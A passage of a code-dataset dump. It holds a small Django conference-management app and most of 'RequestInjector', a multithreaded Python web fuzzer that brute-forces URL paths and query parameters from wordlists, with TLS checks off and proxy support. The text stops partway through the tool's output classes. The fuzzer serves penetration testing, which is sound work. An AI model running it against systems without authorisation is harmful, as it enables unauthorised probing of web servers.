"text": "__author__ = 'cltanuki'\nfrom django.conf.urls import patterns, include, url\nfrom rest_framework.routers import DefaultRouter\nfrom . import views, api\n\nrouter = DefaultRouter()\nrouter.register(r'report', api.ReportViewset)\nrouter.register(r'section', api.SectionViewSet)\nrouter.register(r'conf', api.ConfViewset)\n\nurlpatterns = patterns('',\n url(r'^$', views.ConfIndex.as_view(), name='conf_index'),\n # url(r'^(?P<slug>.+)/$', views.ConfMain.as_view(), name='conf_main'),\n # url(r'^(?P<slug>.+)/', include(item_patterns)),\n)\n# urlpatterns += i18n_patterns('',\n# url(_(r'^about/$'), about_views.main, name='about'),\n# url(_(r'^news/'), include(news_patterns, namespace='news')),\n# )\n\nurlpatterns += router.urls"
},
{
"alpha_fraction": 0.540606677532196,
"alphanum_fraction": 0.5430528521537781,
"avg_line_length": 37.566036224365234,
"blob_id": "1cdfdc96072192331390687d1f046f61f0f4a552",
"content_id": "e70c8b36d89ff20e6c5aa7b92aad63b093e8a77a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2044,
"license_type": "no_license",
"max_line_length": 114,
"num_lines": 53,
"path": "/conf/migrations/0001_initial.py",
"repo_name": "CLTanuki/Interpro",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ('enterprise', '__first__'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Conf',\n fields=[\n ('id', models.AutoField(serialize=False, auto_created=True, verbose_name='ID', primary_key=True)),\n ('title', models.CharField(verbose_name='Title', max_length=20)),\n ('alias', models.CharField(unique=True, verbose_name='Alias', max_length=25)),\n ('date', models.DateField(verbose_name='Date')),\n ('schedule', models.TextField(verbose_name='Shedule')),\n ('thesis_rules', models.TextField(verbose_name='Thesis Rules')),\n ('orgs', models.ManyToManyField(to=settings.AUTH_USER_MODEL, verbose_name='Managers')),\n ('place', models.ForeignKey(to='enterprise.CorpObject', verbose_name='Place')),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='ConfMember',\n fields=[\n ('id', models.AutoField(serialize=False, auto_created=True, verbose_name='ID', primary_key=True)),\n ('is_reporter', models.BooleanField(default=False, verbose_name='Reporter')),\n ('conf', models.ForeignKey(to='Conf.Conf')),\n ('user', models.ForeignKey(to=settings.AUTH_USER_MODEL)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Reports',\n fields=[\n ('id', models.AutoField(serialize=False, auto_created=True, verbose_name='ID', primary_key=True)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n ]\n"
},
{
"alpha_fraction": 0.6992031931877136,
"alphanum_fraction": 0.6992031931877136,
"avg_line_length": 27.714284896850586,
"blob_id": "d1b33d91ae2e3800b7459cc732ceb7640424899d",
"content_id": "1ea5840fc0c7e4bba700a0d52ebb675a6ae7a966",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1004,
"license_type": "no_license",
"max_line_length": 82,
"num_lines": 35,
"path": "/conf/serializers.py",
"repo_name": "CLTanuki/Interpro",
"src_encoding": "UTF-8",
"text": "__author__ = 'cltanuki'\nfrom . import models\nfrom erp.planning.models import Project\nfrom rest_framework import serializers\n\n\nclass ReportSerializer(serializers.HyperlinkedModelSerializer):\n\n class Meta:\n model = models.Report\n fields = ('title', 'slug', 'reporter', 'file', 'begins', 'ends', 'index')\n\n\nclass SectionSerializer(serializers.HyperlinkedModelSerializer):\n reports = ReportSerializer(many=True)\n\n class Meta:\n model = models.Section\n fields = ('title', 'slug', 'master', 'begins', 'ends', 'index', 'reports')\n\n\nclass ConfDataSerializer(serializers.HyperlinkedModelSerializer):\n schedule = SectionSerializer(many=True)\n place = serializers.HyperlinkedIdentityField(view_name='obj-detail')\n\n class Meta:\n model = models.Conference\n fields = ('begins', 'ends', 'orgs', 'thesis_rules', 'schedule')\n\n\nclass ConferenceSerializer(serializers.ModelSerializer):\n data = serializers.RelatedField()\n\n class Meta:\n model = Project"
},
{
"alpha_fraction": 0.7527405619621277,
"alphanum_fraction": 0.7551766037940979,
"avg_line_length": 29.44444465637207,
"blob_id": "3fb87ca0205bd5f2ac2e5924f2d305df7de5e256",
"content_id": "50d27112eabb513df81637c83c11e7a21b25b565",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 821,
"license_type": "no_license",
"max_line_length": 74,
"num_lines": 27,
"path": "/conf/api.py",
"repo_name": "CLTanuki/Interpro",
"src_encoding": "UTF-8",
"text": "__author__ = 'cltanuki'\nfrom rest_framework import viewsets\nfrom . import models, serializers\nfrom erp.planning.models import Project\n\n\nclass ReportViewset(viewsets.ModelViewSet):\n\n serializer_class = serializers.ReportSerializer\n queryset = models.Report.objects.all()\n\n\nclass SectionViewSet(viewsets.ModelViewSet):\n\n serializer_class = serializers.SectionSerializer\n queryset = models.Section.objects.all()\n\n\nclass ConfViewset(viewsets.ModelViewSet):\n\n serializer_class = serializers.ConferenceSerializer\n queryset = Project.objects.filter(item_type_id=22)\n\n def retrieve(self, request, *args, **kwargs):\n self.serializer_class = serializers.ConfDataSerializer\n self.queryset = models.Conference.objects.all()\n return super(ConfViewset, self).retrieve(request, *args, **kwargs)"
}
] | 6 |
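The serializer chain in conf/serializers.py above nests `ReportSerializer` inside `SectionSerializer` and `SectionSerializer` inside `ConfDataSerializer`, keyed off the models' `related_name` values (`reports` and `schedule`). Running DRF serializers needs a full Django project, but the JSON shape they would emit can be sketched with plain dictionaries — every field value below is an invented example; only the nesting mirrors the code:

```python
# Sketch of the nested JSON that ConfDataSerializer would emit.
# Values are invented; the nesting mirrors the serializers above.
import json

conference = {
    "begins": "2014-12-01",
    "ends": "2014-12-03",
    "orgs": ["person-1"],
    "thesis_rules": "...",
    "schedule": [                      # Section objects via related_name='schedule'
        {
            "title": "Opening",
            "slug": "opening",
            "master": "person-1",
            "begins": "2014-12-01",
            "ends": "2014-12-01",
            "index": 1,
            "reports": [               # Report objects via related_name='reports'
                {"title": "Keynote", "slug": "keynote", "reporter": "person-2",
                 "begins": "2014-12-01", "ends": "2014-12-01", "index": 1},
            ],
        },
    ],
}
print(json.dumps(conference, indent=2))
```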
bonifield/RequestInjector
|
https://github.com/bonifield/RequestInjector
|
6159faeddb16de52c447ac2fc18edc293a9d7b8a
|
ec05331e5e7105c3d2a3fcc6629f587c1882d300
|
f8e6dc7c83a0d020c84929b5493e4560f2bc664d
|
refs/heads/main
| 2023-08-11T01:03:25.175753 | 2021-09-21T20:59:05 | 2021-09-21T20:59:05 | 397,393,453 | 3 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.9090909361839294,
"alphanum_fraction": 0.9090909361839294,
"avg_line_length": 43,
"blob_id": "ff8243464f3e71bb8ea611f9837a1335f7f4b66e",
"content_id": "d4e7a8a3ed5bb02533e17826443f7efc7333110b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 44,
"license_type": "permissive",
"max_line_length": 43,
"num_lines": 1,
"path": "/__init__.py",
"repo_name": "bonifield/RequestInjector",
"src_encoding": "UTF-8",
"text": "from requestinjector import RequestInjector\n"
},
{
"alpha_fraction": 0.7196261882781982,
"alphanum_fraction": 0.7196261882781982,
"avg_line_length": 18.545454025268555,
"blob_id": "6787e2ea0bbb0fc7ff8b6b77d6abb4337febd5db",
"content_id": "cf9551b891dfb55aa83965dc9e70aa3582236206",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 214,
"license_type": "permissive",
"max_line_length": 55,
"num_lines": 11,
"path": "/setup.py",
"repo_name": "bonifield/RequestInjector",
"src_encoding": "UTF-8",
"text": "from setuptools import setup\n\nsetup(\n\tpy_modules=[\"requestinjector\"],\n\tentry_points={\n\t\t\"console_scripts\":[\n\t\t\t\"requestinjector = requestinjector:tool_entrypoint\",\n\t\t\t\"ri = requestinjector:tool_entrypoint\"\n\t\t]\n\t}\n)"
},
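requestinjector.py, the next file in this listing, is organized as a three-stage queue pipeline: Filler threads load candidate words into an input queue, Worker threads turn each word into a request and push the result to an output queue, and a Drainer thread prints the results. A minimal sketch of that pattern, with placeholder work standing in for the HTTP calls:

```python
# Minimal sketch of the Filler -> Worker -> Drainer queue pipeline
# used by requestinjector.py; the "work" here is a placeholder, not HTTP.
import queue
import threading

queuein, queueout = queue.Queue(), queue.Queue()

def filler(words):
    # producer: load candidate words into the input queue
    for w in words:
        queuein.put(w)

def worker():
    # consumer/producer: take a word, do the "request", emit a result
    while True:
        item = queuein.get()
        queueout.put(f"processed:{item}")  # the real tool calls makeRequest(url, item) here
        queuein.task_done()

def drainer():
    # output handler: print results as they arrive
    while True:
        print(queueout.get())
        queueout.task_done()

f = threading.Thread(target=filler, args=(["admin", "login", "test"],))
f.start()
for _ in range(3):
    threading.Thread(target=worker, daemon=True).start()
threading.Thread(target=drainer, daemon=True).start()

f.join()         # all words are in the input queue
queuein.join()   # all words have been processed
queueout.join()  # all results have been printed
```

The two queue `join()` calls mirror the real tool's shutdown: the daemon workers are never joined directly; the program instead waits until both queues report every task done.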
{
"alpha_fraction": 0.6545454263687134,
"alphanum_fraction": 0.6690575480461121,
"avg_line_length": 41.51914978027344,
"blob_id": "84eeb763e987f1013c402534be101b23b50c47ab",
"content_id": "e84d5bc3a13d4628d1e774128cca27893ff99855",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 29975,
"license_type": "permissive",
"max_line_length": 424,
"num_lines": 705,
"path": "/requestinjector.py",
"repo_name": "bonifield/RequestInjector",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python3\n\n#=======================================================\n#\n#\tRequest Injector by Bonifield (https://github.com/bonifield)\n#\n#\tv0.9.4\n#\tLast Updated: 2021-09-21\n#\n#\tpath mode (-M path):\n#\t\t# NOTE - although -w accepts a comma-separated list of wordlists as a string, only the first one will be used for this mode\n#\t\t\trequestinjector.py -u \"http://example.com/somepath/a/b/c\" \\\n#\t\t\t-M path \\\n#\t\t\t-w \"/path/to/wordlist.txt\" \\\n#\t\t\t-t 10 \\\n#\t\t\t-r 2 \\\n#\t\t\t-m \\\n#\t\t\t-p '{\"http\": \"http://127.0.0.1:8080\", \"https\": \"https://127.0.0.1:8080\"}' \\\n#\t\t\t-H '{\"Content-Type\": \"text/plain\"}' \\\n#\t\t\t--color\n#\n#\targ mode (-M arg) using shotgun attacktype (-T shotgun):\n#\t\t# NOTE - shotgun is similar to Burp Suite's sniper and battering ram modes; provide one or more keys, and a single wordlist\n#\t\t# NOTE - although -w accepts a comma-separated list of wordlists as a string, only the first one will be used for this attacktype\n#\t\t# NOTE - mutations (-m) not yet available for arg mode\n#\t\t\trequestinjector.py -u \"http://example.com/somepath/a/b/c\" \\\n#\t\t\t-M arg \\\n#\t\t\t-T shotgun \\\n#\t\t\t-K key1,key2,key3,key4 \\\n#\t\t\t-w \"/path/to/wordlist.txt\" \\\n#\t\t\t-S statickey1=staticval1,statickey2=staticval2 \\\n#\t\t\t-t 10 \\\n#\t\t\t-r 2 \\\n#\t\t\t-p '{\"http\": \"http://127.0.0.1:8080\", \"https\": \"https://127.0.0.1:8080\"}' \\\n#\t\t\t-H '{\"Content-Type\": \"text/plain\"}' \\\n#\t\t\t--color\n#\n#\targ mode (-M arg) using trident attacktype (-T trident), and optional static arguments (-S):\n#\t\t# NOTE - trident is similar to Burp Suite's pitchfork mode; for each key specified, provided a wordlist (-w WORDLIST1,WORDLIST2,etc); specify the same wordlist multiple times if using this attacktype and you want the same wordlist in multiple positions\n#\t\t# NOTE - this type will run through to the end of the shortest provided wordlist; use --longest and --fillvalue VALUE to run through the longest provided wordlist instead\n#\t\t# NOTE - mutations (-m) not yet available for arg mode\n#\t\t\trequestinjector.py -u \"http://example.com/somepath/a/b/c\" \\\n#\t\t\t-M arg \\\n#\t\t\t-T trident \\\n#\t\t\t-K key1,key2,key3,key4 \\\n#\t\t\t-w /path/to/wordlist1.txt,/path/to/wordlist2.txt,/path/to/wordlist3.txt,/path/to/wordlist4.txt \\\n#\t\t\t-S statickey1=staticval1,statickey2=staticval2 \\\n#\t\t\t-t 10 \\\n#\t\t\t-r 2 \\\n#\t\t\t-p '{\"http\": \"http://127.0.0.1:8080\", \"https\": \"https://127.0.0.1:8080\"}' \\\n#\t\t\t-H '{\"Content-Type\": \"text/plain\"}' \\\n#\t\t\t--color\n#\n#\targ mode (-M arg) using trident attacktype (-T trident), optional static arguments (-S), and --longest and --fillvalue VALUE (itertools.zip_longest())\n#\t\t# NOTE - trident is similar to Burp Suite's pitchfork mode; for each key specified, provided a wordlist (-w WORDLIST1,WORDLIST2,etc); specify the same wordlist multiple times if using this attacktype and you want the same wordlist in multiple positions\n#\t\t# NOTE - --longest and --fillvalue VALUE will run through to the end of the longest provided wordlist, filling empty values with the provided fillvalue\n#\t\t# NOTE - mutations (-m) not yet available for arg mode\n#\t\t\trequestinjector.py -u \"http://example.com/somepath/a/b/c\" \\\n#\t\t\t-M arg \\\n#\t\t\t-T trident \\\n#\t\t\t-K key1,key2,key3,key4 \\\n#\t\t\t-w /path/to/wordlist1.txt,/path/to/wordlist2.txt,/path/to/wordlist3.txt,/path/to/wordlist4.txt \\\n#\t\t\t-S 
statickey1=staticval1,statickey2=staticval2 \\\n#\t\t\t--longest \\\n#\t\t\t--fillvalue \"AAAA\" \\\n#\t\t\t-t 10 \\\n#\t\t\t-r 2 \\\n#\t\t\t-p '{\"http\": \"http://127.0.0.1:8080\", \"https\": \"https://127.0.0.1:8080\"}' \\\n#\t\t\t-H '{\"Content-Type\": \"text/plain\"}' \\\n#\t\t\t--color\n#\n#\toutput modes: full (default), --simple_output (just status code and full url), --color (same as simple_output but the status code is colorized)\n#\n#\tadditional options:\n#\t\t-d/--delay [FLOAT] = add a delay, per thread, as a float (default 0.0)\n#\n#\tor import as a module (from requestinjector import RequestInjector)\n#\n#=======================================================\n\nimport argparse\nimport itertools\nimport json\nimport os\nimport sys\nimport threading\nimport queue\nimport sys\nimport time\nfrom contextlib import ExitStack\nfrom pathlib import Path\nimport requests\nfrom urllib.parse import urlparse\n# suppress warning\nimport urllib3\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n\n\n\n#================================================\n#\n# Filler Classes\n#\n#================================================\n\n\n\nclass Filler(threading.Thread):\n\t\"\"\"provides the parent class to fill a queue with provided wordlists, key/value pairs, or other items as provided\"\"\"\n\tdef __init__(self, *args, **kwargs):\n\t\tthreading.Thread.__init__(self)\n\t\tself.setDaemon(True)\n\t\tself.name = threading.current_thread().name\n\t\tself.queue = kwargs.get(\"queue\")\n\t\tself.wordlist = kwargs.get(\"wordlist\") # a list of wordlist files\n\t\tself.attacktype = kwargs.get(\"attacktype\")\n\t\tself.staticargs = kwargs.get(\"staticargs\")\n\t\tself.injectkeys = kwargs.get(\"injectkeys\")\n\t\tself.longest = kwargs.get(\"longest\")\n\t\tself.fillvalue = kwargs.get(\"fillvalue\")\n\n\n\nclass PathFiller(Filler):\n\t\"\"\"fills the queue based on path mode requirements\"\"\"\n\tdef __init__(self, *args, **kwargs):\n\t\tsuper().__init__(*args, **kwargs)\n\n\tdef run(self):\n\t\t# self.wordlist is a list, and this mode only accepts the first wordlist\n\t\twith open(self.wordlist[0], \"r\") as f:\n\t\t\tfor line in f:\n\t\t\t\tline = str(line).strip()\n\t\t\t\tself.queue.put(line)\n#\t\t\t\tprint(f\"\\033[95m{self.name}\\033[0m placed {line} into queuein\") # purple\n\t\tf.close()\n\n\n\nclass ArgShotgunFiller(Filler):\n\t\"\"\"fills the queue based on arg mode + shotgun attacktype requirements\"\"\"\n\tdef __init__(self, *args, **kwargs):\n\t\tsuper().__init__(*args, **kwargs)\n\n\tdef makeArg(self, word):\n\t\tl = []\n\t\tfor i in self.injectkeys:\n\t\t\t# make into key=value format\n\t\t\t# TODO: encodings and obfuscations\n\t\t\ti = i.strip() + \"=\" + word.strip()\n\t\t\tl.append(i)\n\t\t#\n\t\t# append static args to the ones generated above\n\t\tif isinstance(self.staticargs, list):\n\t\t\tl = l + self.staticargs\n\t\treturn(l)\n\n\tdef run(self):\n#\t\tprint(f\"\\033[95m{self.name}\\033[0m opening {self.wordlist}\") # purple\n\t\t# self.wordlist is a list, and this attacktype only accepts the first wordlist\n\t\twith open(self.wordlist[0], \"r\") as f:\n\t\t\tfor line in f:\n\t\t\t\tline = str(line).strip()\n\t\t\t\tline = self.makeArg(line)\n\t\t\t\t#\n\t\t\t\t# build a new list not containing empty values\n\t\t\t\tl = [i for i in line if len(i) > 0]\n\t\t\t\t#\n\t\t\t\t# take the list and turn it into a format ready to be pasted onto a URL\n\t\t\t\tif len(l) > 1:\n\t\t\t\t\txxx = \"&\".join(l) # a query string ready to be appended\n\t\t\t\telse:\n\t\t\t\t\txxx 
= \"\".join(l) # smash the list into an empty string or a string containing just the first element\n\t\t\t\tself.queue.put(xxx)\n#\t\t\t\tprint(f\"\\033[95m{self.name}\\033[0m placed {line} into queuein\") # purple\n\t\tf.close()\n\n\n\nclass ArgTridentFiller(Filler):\n\t\"\"\"fills the queue based on arg mode + trident attacktype requirements\"\"\"\n\tdef __init__(self, *args, **kwargs):\n\t\tsuper().__init__(*args, **kwargs)\n\n\tdef run(self):\n\t\twith ExitStack() as stack:\n\t\t\t# open all files at once using the ExitStack context manager\n\t\t\tfiles = [stack.enter_context(open(fname, \"r\")) for fname in self.wordlist]\n\t\t\t# in each file, get a row at the same time, zip() them, and put the output into the queue\n\t\t\tfor (rows) in zip(*files):\n\t\t\t\t# clean each item\n\t\t\t\trows = [r.strip() for r in rows]\n\t\t\t\t# zip the keys and row items into a new tuple\n\t\t\t\tx = [x for x in zip(self.injectkeys,rows)]\n\t\t\t\t# turn the tuples into key=value pairs for using in a URL query\n\t\t\t\txx = [\"=\".join(a) for a in x]\n\t\t\t\t#\n\t\t\t\t# append static args to the ones generated above\n\t\t\t\tif isinstance(self.staticargs, list):\n\t\t\t\t\txx = xx + self.staticargs\n\t\t\t\t#\n\t\t\t\t# build a new list not containing empty values\n\t\t\t\tl = [i for i in xx if len(i) > 0]\n\t\t\t\t#\n\t\t\t\t# take the list and turn it into a format ready to be pasted onto a URL\n\t\t\t\tif len(l) > 1:\n\t\t\t\t\txxx = \"&\".join(l) # a query string ready to be appended\n\t\t\t\telse:\n\t\t\t\t\txxx = \"\".join(l) # smash the list into an empty string or a string containing just the first element\n\t\t\t\t# place the key1=value1&key2=value2... string into the queue\n\t\t\t\tself.queue.put(xxx)\n\n\nclass ArgTridentLongestFiller(Filler):\n\t\"\"\"fills the queue based on arg mode + trident attacktype + --longest requirements\"\"\"\n\tdef __init__(self, *args, **kwargs):\n\t\tsuper().__init__(*args, **kwargs)\n\n\tdef run(self):\n\t\twith ExitStack() as stack:\n\t\t\t# open all files at once using the ExitStack context manager\n\t\t\tfiles = [stack.enter_context(open(fname, \"r\")) for fname in self.wordlist]\n\t\t\t# in each file, get a row at the same time, itertools.zip_longest() them, and put the output into the queue\n\t\t\tfor (rows) in itertools.zip_longest(*files, fillvalue=self.fillvalue):\n\t\t\t\t# clean each item\n\t\t\t\trows = [r.strip() for r in rows]\n\t\t\t\t# zip the keys and row items into a new tuple\n\t\t\t\tx = [x for x in zip(self.injectkeys,rows)]\n\t\t\t\t# turn the tuples into key=value pairs for using in a URL query\n\t\t\t\txx = [\"=\".join(a) for a in x]\n\t\t\t\t#\n\t\t\t\t# append static args to the ones generated above\n\t\t\t\tif isinstance(self.staticargs, list):\n\t\t\t\t\txx = xx + self.staticargs\n\t\t\t\t#\n\t\t\t\t# build a new list not containing empty values\n\t\t\t\tl = [i for i in xx if len(i) > 0]\n\t\t\t\t#\n\t\t\t\t# take the list and turn it into a format ready to be pasted onto a URL\n\t\t\t\tif len(l) > 1:\n\t\t\t\t\txxx = \"&\".join(l) # a query string ready to be appended\n\t\t\t\telse:\n\t\t\t\t\txxx = \"\".join(l) # smash the list into an empty string or a string containing just the first element\n\t\t\t\t# place the key1=value1&key2=value2... 
string into the queue\n\t\t\t\tself.queue.put(xxx)\n\n\n\n#================================================\n#\n# Processing Classes\n#\n#================================================\n\n\n\nclass ProcessUrl:\n\t\"\"\"preps URL variations/mutations for different modes\"\"\"\n\tdef __init__(self, url=\"\", mutate=False, mode=None):\n\t\tself.output = []\n\t\tself.url = self.run(url, mode) # preps/fixes the URL according to the mode\n\t\tself.output.append(self.url)\n\t\tself.mode = mode\n\t\tif not self.mode:\n\t\t\tprint(\"EXCEPTION: ProcessUrl requires a mode argument\")\n\t\t\tsys.exit(1)\n\t\tif mutate:\n\t\t\tself.output = self.mutate(self.url, self.mode)\n\t\t\tself.output.append(self.url)\n\t\t\tself.output = sorted(list(set(self.output)), key=len)\n\t\n\tdef mutate(self, url, mode) -> list:\n\t\t\"\"\"handles mutations and returns a list, to later be placed into the queue\"\"\"\n\t\tif mode == \"path\":\n\t\t\treturn(self.mutatePath(url, mode))\n\t\telif mode == \"arg\":\n\t\t\treturn(self.mutateArg(url, mode))\n\n\tdef mutatePath(self, url, mode) -> list:\n\t\t\"\"\"produces a list of each URL variation based on trimming paths down to the base URL\"\"\"\n\t\t# example: https://example.internal/a/b/c --> https://example.internal/, https://example.internal/a/, https://example.internal/a/b/, https://example.internal/a/b/c/\n\t\tl = []\n\t\tu = urlparse(url)\n\t\tif len(u.path) > 1 and \"/\" in u.path:\n\t\t\tpathsplit = [i for i in u.path.split(\"/\") if len(i) > 0] # a leading slash makes an entry 0 bytes long at index 0\n\t\t\tbaseurl = u.scheme+\"://\"+u.netloc+\"/\" # baseurl now ends with a slash\n\t\t\tl.append(self.run(baseurl, mode))\n\t\t\tfor p in pathsplit:\n\t\t\t\tbaseurl = self.run(baseurl+p, mode) # additional checking\n\t\t\t\tl.append(baseurl)\n\t\t# no \"else\" logic because __init__ already puts the checked URL into the list after this function is called\n\t\treturn(l)\n\n\tdef mutateArg(self, url, mode) -> list:\n\t\t\"\"\"nyi\"\"\"\n\t\treturn([url])\n\n\tdef run(self, url, mode) -> str:\n\t\t\"\"\"prep the URL for mutations and queue placement\"\"\"\n\t\t# ensure that a given URL is stripped to just the path, and ends in a trailing slash, ex. 
https://example.internal/a/b/c --> https://example.internal/a/b/c/\n\t\tif mode == \"path\":\n\t\t\tu = urlparse(url)\n\t\t\tp = u.path\n\t\t\tif not p.endswith(\"/\"):\n\t\t\t\tp = p + \"/\"\n\t\t\tuu = u.scheme+\"://\"+u.netloc+p\n\t\t\treturn(uu)\n\t\telif mode == \"arg\":\n\t\t\t# nyi, prep URL fix actions here before sending to mutate\n\t\t\treturn(url)\n\n\tdef __repr__(self) -> str:\n\t\treturn(self.url)\n\n\n\n#================================================\n#\n# Worker Classes\n#\n#================================================\n\n\n\nclass Worker(threading.Thread):\n\t\"\"\"parent class that retrieves an item from the input queue, makes a web request, and places the results into an output queue\"\"\"\n\tdef __init__(self, *args, **kwargs):\n\t\tthreading.Thread.__init__(self)\n\t\tself.setDaemon(True)\n\t\tself.name = threading.current_thread().name\n\t\tself.queuein = kwargs.get(\"queuein\")\n\t\tself.queueout = kwargs.get(\"queueout\")\n\t\tself.urls = kwargs.get(\"urls\")\n\t\tself.proxy = kwargs.get(\"proxy\")\n\t\tself.headers = kwargs.get(\"headers\")\n\t\tif not self.headers:\n\t\t\tself.headers = {}\n\t\tself.header_default_useragent = \"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0\"\n\t\tself.header_default_accept = \"text/html, application/xhtml+xml, application/xml;q=0.9, */*;q=0.8\"\n\t\tself.url_encode = kwargs.get(\"url_encode\")\n\t\tself.retries = kwargs.get(\"retries\")\n\t\tself.delay = kwargs.get(\"delay\")\n\t\tif len(self.headers) == 0:\n\t\t\tself.headers = {'User-Agent':self.header_default_useragent, 'Accept':self.header_default_accept}\n\t\telse:\n\t\t\tif \"User-Agent\" not in self.headers:\n\t\t\t\tself.headers[\"User-Agent\"] = self.header_default_useragent\n\t\t\tif \"Accept\" not in self.headers:\n\t\t\t\tself.headers[\"Accept\"] = self.header_default_accept\n\t\tif not self.retries:\n\t\t\tself.retries = 1\n\t\tself.bad_domains = {} # tracks domains that raise requests.exceptions.ReadTimeout\n\n\tdef badDomainChecker(self, domain):\n\t\t\"\"\"tracks domains that raise requests.exceptions.ReadTimeout\"\"\"\n\t\tif domain not in self.bad_domains.keys():\n\t\t\t#sys.stderr.write(f\"\\033[91mINFO {self.name}: BAD DOMAIN ADDED: {domain}\\033[0m\\n\") # red\n\t\t\tself.bad_domains[domain] = 1\n\t\telif domain in self.bad_domains.keys():\n\t\t\t#sys.stderr.write(f\"\\033[91mINFO {self.name}: BAD DOMAIN COUNT FOR: {domain} {self.bad_domains[domain]}\\033[0m\\n\") # red\n\t\t\tself.bad_domains[domain] += 1\n\n\tdef prepareUrl(self, url):\n\t\t\"\"\"this will be inherited downstream for modification\"\"\"\n\t\treturn(url)\n\n\tdef makeRequest(self, url, item):\n\t\t\"\"\"handles web request logic\"\"\"\n\t\ttry:\n\t\t\t# set a flag that determines if the request gets made or not, depending on if a domain is responsive or not based on self.badDomainChecker() and self.bad_domains\n\t\t\texecute = \"yes\"\n\t\t\tdomain = urlparse(url).netloc\n\t\t\t# check if the domain is in a thread-internal \"known bad / unresponsive\" dictionary\n\t\t\tif domain in self.bad_domains.keys():\n\t\t\t\tif self.bad_domains[domain] >= self.retries:\n\t\t\t\t\texecute = \"no\"\n\t\t\tif execute == \"yes\":\n\t\t\t\t# word (current queue item) is appended to the URL here\n\t\t\t\turl = url+item\n\t\t\t\t#print(f\"\\033[94m{self.name}\\033[0m requesting website: {url}\") # blue\n\t\t\t\t# make the request, using given (or default) headers, allowing redirects, no TLS validation, given proxies, 3-second timeout, and streaming data\n\t\t\t\t# 
stream=True means the response body content is not downloaded until the .content attribute is accessed, plus raw info (IP etc) can be accessed\n\t\t\t\t# https://docs.python-requests.org/en/master/user/advanced/#body-content-workflow\n\t\t\t\tr = requests.get(url, headers=self.headers, allow_redirects=True, verify=False, proxies=self.proxy, timeout=3, stream=True)\n\t\t\t\t# handle response content\n\t\t\t\t# future: send all content to another object for processing\n\t\t\t\tip = r.raw._fp.fp.raw._sock.getpeername() # socket info only accessible if stream=True and before .content attribute is called (note this will be the proxy IP/port if one is used)\n\t\t\t\tsc = r.status_code\n\t\t\t\tsz = len(r.content) # length of body content, which should (but will not always) match the Content-Length header\n\t\t\t\tr.close() # ALWAYS close a streaming connection\n\t\t\t\t#print(f\"status_code:{sc} bytes:{sz} word:{item} ip:{ip[0]} port:{ip[1]} url:{url}\")\n\t\t\t\treturn(f\"status_code:{sc} bytes:{sz} word:{item} ip:{ip[0]} port:{ip[1]} url:{url}\")\n\t\t\telse:\n\t\t\t\treturn(f\"EXCEPTION {self.name}: {url} REASON: requests.exceptions.ReadTimeout EXTRA: hit max internal allowed retries: ({self.retries})\") # note this pseudo-exception will get displayed on stderr by Drainer\n\t\texcept Exception as e:\n\t\t\t# if the domain generates an exception, increment its counter in the dictionary\n\t\t\tself.badDomainChecker(domain)\n\t\t\treturn(f\"EXCEPTION {self.name}: {url} REASON: requests.exceptions.ReadTimeout EXTRA: count: {self.bad_domains[domain]}, max allowed: {self.retries}\") # note this exception will get displayed on stderr by Drainer\n\n\n\tdef run(self):\n\t\t\"\"\"invoke the request\"\"\"\n\t\twhile True:\n\t\t\t# get item to work on from first queue\n\t\t\titem = self.queuein.get()\n#\t\t\tprint(f\"\\033[94m{self.name}\\033[0m got item from queuein: {item}\") # blue\n\t\t\t# process that item for each URL variation\n\t\t\tfor url in self.urls:\n\t\t\t\t# prepareUrl() will be different for each type (path, arg, etc) and is modified in the subclass\n\t\t\t\turl = self.prepareUrl(url)\n#\t\t\t\tprint(f\"\\033[94m{self.name}\\033[0m prepped {url}\") # blue\n\t\t\t\tif self.delay:\n\t\t\t\t\ttime.sleep(self.delay)\n\t\t\t\tresult = self.makeRequest(url, item)\n\t\t\t\t# put the result of each url+item request into the second queue\n\t\t\t\tself.queueout.put(result)\n#\t\t\t\ts = f\"\\033[94m{self.name}\\033[0m put item into queueout: {result}\" # blue\n\t\t\t# tell queuein the task is finished (for the queue.join() at the end)\n\t\t\tself.queuein.task_done()\n\n\n\nclass PathWorker(Worker):\n\t\"\"\"performs web requests according to path mode requirements\"\"\"\n\tdef __init__(self, *args, **kwargs):\n\t\tsuper().__init__(*args, **kwargs)\n\n\tdef prepareUrl(self, url):\n\t# extra logic to double-check that the URL has a trailing slash, but ProcessUrl should handle this properly\n\t\tif not url.endswith(\"/\"):\n\t\t\turl = url + \"/\"\n\t\treturn(url)\n\n\n\nclass ArgWorker(Worker):\n\t\"\"\"performs web requests according to arg mode requirements\"\"\"\n\tdef __init__(self, *args, **kwargs):\n\t\tsuper().__init__(*args, **kwargs)\n\n\tdef prepareUrl(self, url):\n\t# extra logic to double-check that the URL has no trailing slash\n\t\tif url.endswith(\"/\"):\n\t\t\turl = url.rstrip(\"/\")\n\t\tif not url.endswith(\"?\"):\n\t\t\turl = url + \"?\"\n\t\treturn(url)\n\n\n\n#================================================\n#\n# Drainer Classes (Output 
